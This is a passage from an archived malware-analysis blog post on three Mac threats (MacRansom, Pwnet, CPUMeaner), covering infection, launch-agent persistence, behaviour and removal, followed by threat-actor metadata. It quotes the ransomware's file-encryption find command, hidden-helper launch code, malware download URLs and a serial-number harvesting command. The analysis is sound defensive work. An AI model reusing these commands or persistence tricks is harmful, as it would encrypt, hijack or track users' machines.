:)\n features:\nAs its name suggests, MacRansom will ransom (encrypt) users' files. Once up and running it checks to see if it's hit a 'trigger'\ndate. 
That is, it checks if the current time is past a hard-coded value. According to the Fortinet report, this is set by the\nmalware author (part of the 'ransomware as a service'). If the current time is before this date, the malware will not encrypt\n(ransom) any files, and instead will exit:\nHowever, if the trigger date has been hit, ransoming commences! Specifically, at address 0x000000010b4eb5f5, the malware\nexecutes the following via system to begin encrypting the user's files:\n(lldb)\nProcess 7280 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over\r\nframe #0: 0x000000010b4eb5f5 .FS_Store`___lldb_unnamed_symbol1$$.FS_Store + 1541\r\n  -\u003e 0x10b4eb5f5 \u003c+1541\u003e: callq 0x10b4ec8fe ; symbol stub for: system\r\n  0x10b4eb5fa \u003c+1546\u003e: movaps 0x151f(%rip), %xmm0\r\n  0x10b4eb601 \u003c+1553\u003e: movaps %xmm0, -0x850(%rbp)\r\n  0x10b4eb608 \u003c+1560\u003e: movb $0x0, -0x840(%rbp)\r\n(lldb) x/s $rdi\r\n0x7fff547123e0: \"find /Volumes ~ ! -path \"/Users/user/Library/.FS_Store\" -type f -size +8c -user `whoami` -perm -u=r -exec\r\n\"/Users/user/Library/.FS_Store\" {} +\"\r\nWhat does this command do?\r\nfind /Volumes ~ ! -path \"/Users/user/Library/.FS_Store\" -type f -size +8c -user `whoami` -perm -u=r -exec\r\n\"/Users/user/Library/.FS_Store\" {} +\r\nFirst, it returns a list of the user's files that are readable and bigger than 8 bytes. Then these files are passed to (a new instance\r\nof) the malware, in order to be encrypted! We can observe this encryption via a utility such as fs_usage:\r\naccess (_W__) /Users/user/Desktop/pleaseDontEncryptMe.txt\r\nopen F=50 (RW____) /Users/user/Desktop/pleaseDontEncryptMe.txt\r\nWrData[AT1] D=0x018906a8 /Users/user/Desktop/pleaseDontEncryptMe.txt\r\nThe actual encryption routine of the malware begins at 0x0000000100002160. 
This function is invoked indirectly via a call\r\nto 'pthread_create()':\r\nAs noted by Fortinet, the encryption is not some RSA-based scheme, but rather uses a symmetric cryptographic algorithm.\r\nUnfortunately (for users), though there is a static key (0x39A622DDB50B49E9), Joven and Chin Yick Low state that for\r\neach file the key is \"permuted with a random generated number.\" Moreover, this random permutation is not saved nor\r\nconveyed to the attacker.\r\nThus it appears that once encrypted, the files are pretty much gone for good (save perhaps for a brute-force decryption\r\nattack).\r\nGood news: RansomWhere? can generically detect and block this attack:\r\n disinfection:\r\nMacRansom can easily be removed from an infected system, via the following steps:\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n $ launchctl unload ~/Library/LaunchAgents/com.apple.finder.plist\r\n2. Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.apple.finder.plist\r\n3. Remove the malware's persistent copy, ~/Library/.FS_Store, along with any other components it created.\r\n Pwnet\r\nfound: August, SentinelOne\r\ninfection: trojanized 'CS:GO hack'\r\nfeatures: cryptocurrency miner\r\ndisinfection: remove launch daemon and miner\r\nwriteups: \"Osx.Pwnet.A - CS: GO hack and sneaky miner\" (SentinelOne)\r\nArnaud Abbati (@noarfromspace), who uncovered Pwnet, describes it as a \"trojan that could mine CryptoCurrencies\r\nwithout user consent\" embedded in a hack for Counter-Strike: Global Offensive.\r\n infection:\r\nArnaud notes that the infection vector for Pwnet begins at vlone.cc. 
Though this portal now appears offline, in the past users\r\ncould log in to download a hack for the popular game, 'Counter-Strike Global Offensive'.\r\nThe main binary (vhook) is not signed:\r\n...and must be run with root privileges:\n $ ./vhook\n\n Root access required!\n Please type \"sudo ./vhook\"\nIn the background, Arnaud states that, \"vHook also sneaky downloads and extracts https://vlone.cc/abc/assets/asset.zip as\nfonts.zip to /var/, changes directory to /var and runs sudo ./helper \u0026.\"\nThis binary, helper, downloads yet more components (such as com.dynamsoft.WebHelper), which in turn download still\nmore items. (For details see Arnaud's writeup: \"Osx.Pwnet.A - CS: GO hack and sneaky miner\".) The end result is\nOSX/Pwnet being persistently installed.\n persistence:\nThe final action of the installer is to download a binary named WebTwainService (from\nhttps://www.vlone.cc/abc/assets/d.zip), which is persisted as a launch daemon via com.dynamsoft.WebTwainService.plist:\n $ cat com.dynamsoft.WebTwainService.plist\n \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n \u003cplist version=\"1.0\"\u003e\n \u003cdict\u003e\n \u003ckey\u003eStandardErrorPath\u003c/key\u003e\n \u003cstring\u003e/var/log/webtwain.log\u003c/string\u003e\n \u003ckey\u003eStandardOutPath\u003c/key\u003e\n \u003cstring\u003e/var/log/webtwain.log\u003c/string\u003e\n \u003ckey\u003eKeepAlive\u003c/key\u003e\n \u003ctrue/\u003e\n \u003ckey\u003eLabel\u003c/key\u003e\n \u003cstring\u003ecom.dynamsoft.WebTwainService\u003c/string\u003e\n \u003ckey\u003eRunAtLoad\u003c/key\u003e\n \u003ctrue/\u003e\n \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\n \u003cstring\u003e/var/.log/WebTwainService\u003c/string\u003e\r\n \u003c/array\u003e\r\n \u003c/dict\u003e\r\n \u003c/plist\u003e\r\nAs the 'RunAtLoad' key is set to true, the value in 'ProgramArguments' (/var/.log/WebTwainService) will be\r\nautomatically executed by the OS each time the infected computer is restarted.\r\n features:\r\nThe main goal of Pwnet is to mine cryptocurrency via an official minergate command line tool.\r\nFirst, the malware's persistent daemon, WebTwainService, executes the com.dynamsoft.webhelper binary:\r\n int _main(int arg0, int 
arg1)\r\n {\r\n var_18 = objc_autoreleasePoolPush();\r\n system(\"cd /var/.log/;sudo ./com.dynamsoft.WebHelper \u0026\");\r\n objc_autoreleasePoolPop(var_18);\r\n goto loc_100000b27;\r\n loc_100000b27:\r\n sleep(0xe10);\r\n goto loc_100000b27;\r\n }\r\nAs Arnaud notes in his writeup, com.dynamsoft.webhelper performs various actions, including executing the minergate cli\r\n(which Pwnet names 'com.apple.SafariHelper'):\r\ncd /var/.trash/.assets/; ./com.apple.SafariHelper\r\nWhen the miner 'com.apple.SafariHelper' is executed, it eats up all CPU cycles in order to mine XMR (Monero).\r\n disinfection:\r\nTo remove OSX/Pwnet, first unload and remove its persistent launch daemon plist:\r\n $ launchctl unload /Library/LaunchDaemons/com.dynamsoft.WebTwainService.plist\r\n $ rm /Library/LaunchDaemons/com.dynamsoft.WebTwainService.plist\r\nThen delete all installed components, which are stored in various 'hidden' directories under /var/, such as:\r\n/Library/LaunchDaemons/com.dynamsoft.WebTwainService.plist\r\n/var/.log/\r\n/var/.trash/\r\n/var/.old\r\nFinally, if the miner binary ('com.apple.SafariHelper') is running, terminate it!\r\n CPUMeaner\r\nfound: November, SentinelOne\r\ninfection: trojanized pirated applications\r\nfeatures: cryptocurrency miner\r\ndisinfection: remove launch agent and miner\r\nwriteups: \"OSX.CPUMeaner: New Cryptocurrency Mining Trojan Targets Macos\" (SentinelOne)\r\nOSX/CPUMeaner is a cryptocurrency miner that targets macOS users. 
Arriving in pirated applications, it mines Monero.\r\nArnaud Abbati (@noarfromspace), who uncovered CPUMeaner, provides an in-depth technical writeup on the malware.\r\n infection:\r\nArnaud notes that the infection vector for CPUMeaner can come from a variety of sources:\r\n\"Individuals using pirated software could end up with malware from a variety of sources including a simple Google search\r\nand a YouTube video with a malicious link in its description. In the middle of technical support scams, fake Flash players,\r\nand recommended virus scans, the victim could end up with a malicious package.\"\r\nAt this time, Apple has revoked the certificate used to sign (at least some instances of) the malware:\r\n persistence:\r\nWhen the user runs the malicious installer (.pkg), it will execute the package's 'post install' script. Using the neat 'Suspicious\r\nPackage' application, we can statically examine this script:\r\nIn short, it persists CPUMeaner as a launch agent via the /Library/LaunchAgents/com.osxext.cpucooler.plist file. As the\r\n'RunAtLoad' key is set to true, whenever the system is rebooted and the user logs in, whatever is specified in the Program key\r\nwill be automatically executed by the OS. Examining this key, we can see it's set to /Library/Application\r\nSupport/CpuCooler/cpucooler:\r\nINSTALL_LOCATION=\"/Library/Application Support/CpuCooler/cpucooler\"\r\n...\r\n\u003ckey\u003eProgram\u003c/key\u003e\r\n\u003cstring\u003e'$INSTALL_LOCATION'\u003c/string\u003e\r\n features:\r\nThe main goal of CPUMeaner is to mine cryptocurrency. 
Arnaud determined that cpucooler is a \"custom builds of XMRig\r\nversion 2.3.1, an open-source Monero CPU miner\"\r\nThough the author added some extra functionality to obfuscate strings, Arnaud wrote a deobfuscation python script:\r\n $ decrypt_strings.py cpucooler\r\n \r\n ioreg -rd1 -w0 -c AppleAHCIDiskDriver\r\n | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n jumpcash.xyz\r\n \r\n stratum+tcp://xmr.pool.minergate.com:45560\r\n jeffguyen@mail.com\r\nThese deobfuscated strings (plus binary analysis) confirm that binary, cpucooler is a cryptominer, which will \"mine on\r\nMinerGate XMR pool for jeffguyen@mail.com.\"\r\nBesides pegging your CPU to mine cryptocurrency, CPUMeaner also pings a remote server, jumpcash.xyz with some\r\ninstallation data. This may include infected system's serial number - as grabbed by the output of the (deobfuscated) ioreg\r\ncommand:\r\n ioreg -rd1 -w0 -c AppleAHCIDiskDriver\r\n | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print\r\n disinfection:\r\nTo remove CPUMeaner, first unload and remove its persistent launch agent plist:\r\n $ launchctl unload /Library/LaunchAgents/com.osxext.cpucooler.plist\r\n $ rm /Library/LaunchAgents/com.osxext.cpucooler.plist\r\nThen delete the miner binary, /Library/Application Support/CpuCooler/. Finally if the miner binary (cpucooler) is running,\r\nterminate it!\r\n Note:\r\n There are other variants of CPUMeaner such as 'XMemApp' that may install the\r\n cryptocurrency miner to other locations.\r\n See Arnaud's excellent writeup for details on these variants.\r\nThanks\r\nI briefly want to thank the following fellow malware analysts/macOS reversers! Their research and assistance has been\r\nparamount to my own research, conference talks, and the advancement of my macOS knowledge:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 66 of 67\n\n@0xAmit\r\n@Morpheus______\r\n@noarfromspace\r\n@osxreverser\r\n@theJoshMeister\r\n@thomasareed\r\nlove these blog posts \u0026 tools? 
you can support them via patreon! Mahalo :)\r\nSource: https://objective-see.com/blog/blog_0x25.html\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 67 of 67",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x25.html"
	],
	"report_names": [
		"blog_0x25.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434184,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/62e8e695a08a7e3c1db4e245db414809b38dd968.pdf",
		"text": "https://archive.orkl.eu/62e8e695a08a7e3c1db4e245db414809b38dd968.txt",
		"img": "https://archive.orkl.eu/62e8e695a08a7e3c1db4e245db414809b38dd968.jpg"
	}
}